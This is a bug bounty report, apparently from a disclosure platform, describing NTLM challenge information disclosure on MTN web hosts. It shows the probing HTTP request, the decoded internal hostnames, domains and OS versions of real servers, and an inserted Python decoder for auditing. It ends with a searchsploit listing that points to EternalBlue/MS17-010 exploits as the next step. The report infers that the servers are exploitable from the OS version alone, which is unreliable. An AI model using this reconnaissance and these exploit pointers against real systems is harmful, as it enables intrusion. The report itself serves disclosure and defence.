Disclosure of internal information using hidden NTLM authentication leading to an exploit server
High
## Vulnerability Details
By sending a GET request to the URL [http://www.mtncongo.net/fr/Pages/](http://www.mtncongo.net/fr/Pages/) of the blog, we collect sensitive internal information about the server hosting the blog.
## Steps
Typically, when visiting a website such as http://www.mtncongo.net/ or a directory such as http://www.mtncongo.net/fr/Pages/ that requires privileged access, the server initiates a login prompt. This lets the client send blank username and password values to check for NTLM authentication and receive the encoded response. However, if the target server is configured to allow Windows Authentication, it may be possible to obtain this response without any login prompt, by adding the header “Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=” (a base64-encoded NTLM NEGOTIATE_MESSAGE, Type 1) to the request.
Once an NTLM challenge is returned in the “WWW-Authenticate” value of the response headers, it can be decoded to capture internal information. I personally use Burp’s NTLM Challenge Decoder, but multiple other scripts have been written that can perform these actions.
```http
GET /fr/Pages/ HTTP/1.1
Host: www.mtncongo.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: _ga=GA1.2.1970872956.1586929016; TS018d6ddd=01c53200304ba8c07c5d1e1605e0dc70471aa0d1c81ddc94c3b123534979fa4847a53cfa75467281d64fa48324e4a64f699cc4c2df
Upgrade-Insecure-Requests: 1
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
```
```
Target MTNICT
MsvAvNbComputerName ZACNVSPRWSBS01
MsvAvDnsDomainName mtnict.local
Version Windows Server 2012 R2 / Windows 8.1
MsvAvNbDomainName MTNICT
MsvAvDnsComputerName ZACNVSPRWSBS01.mtnict.local
MsvAvDnsTreeName mtnict.local
MsvAvTimestamp 2020-04-17 03:58:41
```
This same vulnerability is present on the blog www.mtnbusiness.co.za
```
Target MTNGROUPSA
MsvAvNbComputerName PSWSPEMVA21
MsvAvDnsDomainName mtn.co.za
Version Windows Server 2012 R2 / Windows 8.1
MsvAvNbDomainName MTNGROUPSA
MsvAvDnsComputerName PSWSPEMVA21.mtn.co.za
MsvAvDnsTreeName mtn.co.za
MsvAvTimestamp 2020-04-18 05:30:12
```
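The decoding that Burp's NTLM Challenge Decoder performs on the two responses above, written out as an added example (this is not the reporter's tooling and not Burp's code). It parses an NTLM CHALLENGE_MESSAGE (Type 2) per MS-NLMP, walks the AV_PAIR target-info list, converts the FILETIME timestamp, maps the Version block to a product name, and reports which fields reveal internal naming or patch level, so an operator can audit what their own IIS host hands to an unauthenticated client. The sample challenge is constructed inside the script with placeholder names (EXAMPLECORP, WEB01, example.local), not captured from any host.

```python
"""Decode an NTLM CHALLENGE_MESSAGE (Type 2) and list what it discloses.
Added example for this write-up; layout follows MS-NLMP 2.2.1.2 / 2.2.2.1.
The sample message below is constructed with placeholder values."""
import base64
import struct
from datetime import datetime, timedelta, timezone

NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_NTLM = 0x00000200
NEGOTIATE_TARGET_INFO = 0x00800000
NEGOTIATE_VERSION = 0x02000000

AV_NAMES = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
            3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName",
            5: "MsvAvDnsTreeName", 6: "MsvAvFlags", 7: "MsvAvTimestamp",
            8: "MsvAvSingleHost", 9: "MsvAvTargetName", 10: "MsvAvChannelBindings"}
AV_STRINGS = {1, 2, 3, 4, 5, 9}          # UTF-16LE valued pairs
# ProductMajor.ProductMinor -> product name (the mapping challenge decoders print)
OS_VERSIONS = {(6, 1): "Windows 7 / Windows Server 2008 R2",
               (6, 2): "Windows 8 / Windows Server 2012",
               (6, 3): "Windows 8.1 / Windows Server 2012 R2",
               (10, 0): "Windows 10 / Windows Server 2016 or later"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# Fields that reveal internal naming or patch level; the ones a defender reviews
INTERNAL_FIELDS = ("MsvAvNbComputerName", "MsvAvDnsComputerName",
                   "MsvAvDnsDomainName", "MsvAvDnsTreeName", "Version")


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100-ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_av_pairs(blob: bytes) -> dict:
    """Walk the AV_PAIR list until MsvAvEOL (AvId 0)."""
    out, pos = {}, 0
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        value = blob[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len
        if av_id == 0:
            break
        name = AV_NAMES.get(av_id, f"MsvAvUnknown{av_id}")
        if av_id in AV_STRINGS:
            out[name] = value.decode("utf-16-le")
        elif av_id == 7:
            out[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            out[name] = value.hex()
    return out


def parse_challenge(token: str) -> dict:
    """token: the base64 text after 'NTLM ' in a WWW-Authenticate header."""
    msg = base64.b64decode(token)
    if msg[:8] != b"NTLMSSP\x00":
        raise ValueError("not an NTLMSSP message")
    (msg_type,) = struct.unpack_from("<I", msg, 8)
    if msg_type != 2:
        raise ValueError(f"expected CHALLENGE_MESSAGE (type 2), got type {msg_type}")
    tn_len, _, tn_off = struct.unpack_from("<HHI", msg, 12)   # TargetNameFields
    (flags,) = struct.unpack_from("<I", msg, 20)
    ti_len, _, ti_off = struct.unpack_from("<HHI", msg, 40)   # TargetInfoFields
    result = {"NegotiateFlags": flags, "ServerChallenge": msg[24:32].hex()}
    name = msg[tn_off:tn_off + tn_len]
    result["TargetName"] = name.decode("utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii")
    if flags & NEGOTIATE_VERSION:          # Version block exists only with this flag
        major, minor, build = struct.unpack_from("<BBH", msg, 48)
        result["Version"] = f"{major}.{minor} build {build} ({OS_VERSIONS.get((major, minor), 'unknown')})"
    if flags & NEGOTIATE_TARGET_INFO:
        result.update(parse_av_pairs(msg[ti_off:ti_off + ti_len]))
    return result


def disclosed_internal_fields(parsed: dict) -> list:
    """Sensitive fields the challenge handed out; an empty list means nothing leaked."""
    return [f for f in INTERNAL_FIELDS if f in parsed]


def build_sample_challenge() -> str:
    """Constructed Type 2 message with placeholder values (not captured from any host)."""
    def u16(s):
        return s.encode("utf-16-le")

    def av(av_id, value):
        return struct.pack("<HH", av_id, len(value)) + value

    delta = datetime(2020, 1, 2, 3, 4, 5, tzinfo=timezone.utc) - FILETIME_EPOCH
    ticks = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    target_name = u16("EXAMPLECORP")
    target_info = (av(2, u16("EXAMPLECORP")) + av(1, u16("WEB01"))
                   + av(4, u16("example.local")) + av(3, u16("WEB01.example.local"))
                   + av(5, u16("example.local")) + av(7, struct.pack("<Q", ticks)) + av(0, b""))
    flags = NEGOTIATE_UNICODE | NEGOTIATE_NTLM | NEGOTIATE_TARGET_INFO | NEGOTIATE_VERSION
    tn_off = 56                                   # fixed header length incl. Version block
    ti_off = tn_off + len(target_name)
    header = (b"NTLMSSP\x00" + struct.pack("<I", 2)
              + struct.pack("<HHI", len(target_name), len(target_name), tn_off)
              + struct.pack("<I", flags)
              + bytes.fromhex("0123456789abcdef")        # ServerChallenge, fixed for the demo
              + bytes(8)                                 # Reserved
              + struct.pack("<HHI", len(target_info), len(target_info), ti_off)
              + struct.pack("<BBHBBBB", 6, 3, 9600, 0, 0, 0, 15))  # 6.3 build 9600, NTLMRevision 15
    return base64.b64encode(header + target_name + target_info).decode()


if __name__ == "__main__":
    parsed = parse_challenge(build_sample_challenge())
    for key, value in parsed.items():
        print(f"{key:22} {value}")
    print("disclosed:", disclosed_internal_fields(parsed))
```

To check a host you operate, paste the value after `NTLM ` from its `WWW-Authenticate` header into `parse_challenge`; if `disclosed_internal_fields` is non-empty, the server is answering anonymous clients with its internal hostname, domain and OS version. Those fields are intrinsic to the NTLM challenge, so the fix is to stop offering NTLM (Windows Authentication) on Internet-facing endpoints rather than to trim the response.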
Obviously we now have the target name, the computer name and, most importantly, the OS version: Windows Server 2012 R2 / Windows 8.1, which is vulnerable to the remote attack MS17-010 (CVE-2017-0144).
The next step would be to run Metasploit with the exploit "Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)".
Exploiting this vulnerability would go against the program's policy.
I would like to point out that this vulnerability is clearly dangerous, and exploiting it would be trivial for a malicious attacker.
```
-------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | exploits/windows/dos/41891.rb
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
-------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
```
## Impact
- Malicious attackers can add bitcoin mining code to the site's architecture
- Modify the database
- Collect personal information on blog staff
Report Stats
- Report ID: 853284
- State: Closed
- Substate: resolved
- Upvotes: 10